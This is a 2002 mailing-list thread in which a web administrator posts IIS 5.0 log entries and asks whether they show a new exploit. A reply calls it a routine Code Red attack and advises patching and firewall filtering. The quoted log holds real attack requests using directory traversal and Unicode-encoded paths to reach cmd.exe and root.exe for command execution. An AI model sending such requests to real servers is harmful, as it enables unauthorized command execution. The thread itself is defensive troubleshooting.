With my "basic" green knowledge, it looks like a regular Code Red attack.

As long as you are up to date on patches, including running IIS
lockdown, you should be fine. But you could also stop it at the firewall
and/or router.

John Tolmachoff
IT Manager, Network Engineer
RelianceSoft, Inc.
Fullerton, CA  92835
www.reliancesoft.com


-----Original Message-----
From: Steve Weitzman [mailto:[EMAIL PROTECTED]] 
Sent: Monday, July 01, 2002 10:14 PM
To: [EMAIL PROTECTED]
Subject: log question

Over the last few days I have seen the same 15 or so lines appear in my
MS2000 web logs several times.  They are obvious hack attempts.  What I
need to know is whether this is a new exploit or one that I am already
patched against. I have what I believe to be the latest patches from the
Microsoft website.


#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2002-06-26 04:29:25
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs-host cs(User-Agent) cs(Referer)
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /scripts/root.exe /c+dir 404 www - -
2002-06-26 04:29:25 66.183.53.160 - 192.168.0.200 80 GET /MSADC/root.exe /c+dir 403 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /c/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:26 66.183.53.160 - 192.168.0.200 80 GET /d/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:27 66.183.53.160 - 192.168.0.200 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:29 66.183.53.160 - 192.168.0.200 80 GET /scripts/winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /winnt/system32/cmd.exe /c+dir 404 www - -
2002-06-26 04:29:30 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 www - -
2002-06-26 04:29:31 66.183.53.160 - 192.168.0.200 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 www - -

Anyone know the answer or know where I need to go to find it?

Steve Weitzman
[EMAIL PROTECTED]

